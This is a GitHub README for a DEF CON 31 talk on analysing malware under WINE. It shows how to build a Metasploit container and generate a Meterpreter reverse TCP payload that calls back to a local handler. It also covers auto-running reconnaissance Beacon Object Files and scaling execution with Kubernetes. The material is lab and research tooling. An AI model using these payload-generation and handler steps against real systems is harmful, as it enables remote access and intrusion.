Skip to content

archcloudlabs/DEFCON_2023_Wine_Pairing_with_Malware

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

WINE Pairing with Malware

This repository is a companion guide to my DEF CON 31 Packet Hacking Village talk "Wine Pairing with Malware".

Disclaimer

Throughout this guide you will generate your own Metasploit payloads to execute in WINE. If you're going to execute malware from the wild, ensure you're taking appropriate measures to protect the host machine. WINE provides no sand boxing functionality. Arch Cloud Labs is not responsible for any damage caused by blindly executing malware.

Requirements

  • Podman (docker should work unless explicitly noted)
  • WINE

Building Kali w/ Metasploit Docker Container

  1. Install wine on the Linux host of your choice via the package manager.

  2. Pull kali-rolling from Docker hub.

$> podman pull kalilinux/kali-rolling
  1. Start the kali container and get a shell
$> podman run --name kali -ti kalilinux/kali-rolling /bin/bash
  1. Update container and install metasploit-framework and vim
$> apt-get update -y && apt-get install vim metasploit-framework -y
  1. Now you can exit the container.
$> exit
  1. Commit container with the image name of kali and a tag of "msf". This will be used in the later examples.
$> podman commit kali kali:msf

Getting Initial Meterpreter Shell

  1. Modify configs/msf_payload_gen.msf to your desired configuration or use the default values. The default configuration will generate a x64 Meterpreter reverse TCP PE executable to connect on 127.0.0.1 at port 4444.
use payload/windows/x64/meterpreter_reverse_tcp # Set desired payload here
set LHOST 127.0.0.1 # Modify this for your MSF Handler
set LPORT 4444 # Specify port here
generate -f exe -o /tmp/evil.exe
exit
  1. Leverage the provided generate_payload.sh to generate evil.exe, our test Metasploit payload. This script leverages the previously built Kali Metasploit container to generate a Meterpreter exe in the current root directory of this Github project.

Note, all paths are relative to the root directory for this project

$> ./scripts/generate_payload.sh

Upon successful execution, "evil.exe" should exist in the current working directory.

  1. Start the Metasploit handler via the provided script ./scripts/start_handler.sh.

This bash script spawns the previously created Kali Metasploit container with a resource script to easily create a Metasploit hander. This is done via the --net=host argument to share the underlying host machine's network namespace. By default, the provided x64_reverse_tcp_payload_handler.msf script is set to listen on 127.0.0.1 on port 4444.

$> ./scripts/start_handler.sh
  1. Execute the evil.exe payload via wine from the host machine.
$> wine evil.exe
  1. Upon successful execution, you should have obtained a Meterpreter session.

Automating BoF Execution & Testing w/ Metasploit

Expanding on the previous two sections, we'll now explore auto executing and obtaining the output of Beacon object Files (BoFs). This repo leverages Trusted Sec's Situational Awareness BoFs.

  1. Obtain and compile the Beacon Object Files from Trusted Sec's Repo.

  2. Modify ./configs/bof_autorun to specify the BoF to run. For this example, I'm using the arp.x64.o BoF to obtain network information.

  3. Execute ./scripts/start_bof_handler.sh to spawn a Metasploit handler that will load the BoF extension and execute your desired BoF upon successful Meterpreter session connection. The default configuration of this repository assumes BoFs are in the ./bof directory. The ./configs/bof_autorun script should be updated to reflect the name of the BoF being executed.

  4. Now that our BoF handler is running, execute wine evil.exe. This will cause the following to happen:

  • The meterpreter payload will to connect to our handler.
  • The BoF extension will be loaded into the meterpreter session.
  • The autorun script will load and execute the specified bof.
  • all output will be logged to msf_bof.log and placed in the root of this directory.
  1. Your malware.exe should have been killed if successful. Now cat msf_bof.log to see the results! An example of the output is shown below.
Success.
resource (/tmp/configs/bof_autorun.msf)> execute_bof /tmp/bofs/arp.x64.o
[*] No arguments specified, executing bof with no arguments.

Inteface  --- 0x1
Internet Address        Physical Address        Type
224.0.0.22                                      static
239.255.255.250                                 static

Inteface  --- 0x2
Internet Address        Physical Address        Type
172.20.0.1              0C-C4-7A-BD-31-4E       dynamic
172.20.1.184            A0-78-17-64-55-5B       dynamic
224.0.0.22                                      static
239.255.255.250                                 static

Inteface  --- 0x3
Internet Address        Physical Address        Type
224.0.0.22                                      static
239.255.255.250                                 static

From Single Container to Kubernetes YAML

The Dockerfile at the root of this repository simply installs wine, copies over a user's specified malware sample (in this case our previously used evil.exe) and executes it for 10 seconds before being terminated via the timeout command. This container can be built via the following command:

$> podman build . -t acl:wine-execution

When running the metasploit paylaod in a container, also run Wireshark on the host machine to capture the traffic and identify the initial connection to the Metasploit handler.

While this is effective, it doesn't help with scaling the amount of malware you execute. Podman can generate Kubernetes Pod YAML from previously run containers. This enables you to start exploring the possibility of executing in a Kubernetes cluster! To generate Kubernetes YAML for a pod deployment, simply execute podman kube generate CONTAINER_NAME. An example of output has been shown below.

$> podman kube generate 

---
apiVersion: v1
kind: Pod
metadata:
  annotations:
    bind-mount-options: /home/dllcoolj/DEFCON_2023_Wine_Pairing_with_Malware:z
  creationTimestamp: "2023-08-08T14:54:13Z"
  labels:
    app: admiringantonelli-pod
  name: admiringantonelli-pod
spec:
  containers:
  - command:
    - msfconsole
    - -q
    - -r
    - /tmp/configs/x64_reverse_tcp_payload_handler_bof.msf
    image: localhost/kali:msf
    name: admiringantonelli
    stdin: true
    tty: true
    volumeMounts:
    - mountPath: /tmp/
      name: home-dllcoolj-DEFCON_2023_Wine_Pairing_with_Malware-host-0
  hostNetwork: true
  hostname: DEFCON
  volumes:
  - hostPath:
      path: /home/dllcoolj/DEFCON_2023_Wine_Pairing_with_Malware
      type: Directory
    name: home-dllcoolj-DEFCON_2023_Wine_Pairing_with_Malware-host-0

Leveraging a "developer" Kubernetes distribution like Minikube, can enable you to start executing WINE on a larger scale. However, you will need to ensure that each pod is executing a different malware sample in order to process your queue.

About

Arch Cloud Labs Presentation for DEF CON 2023 - WINE Pairing with Malware

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published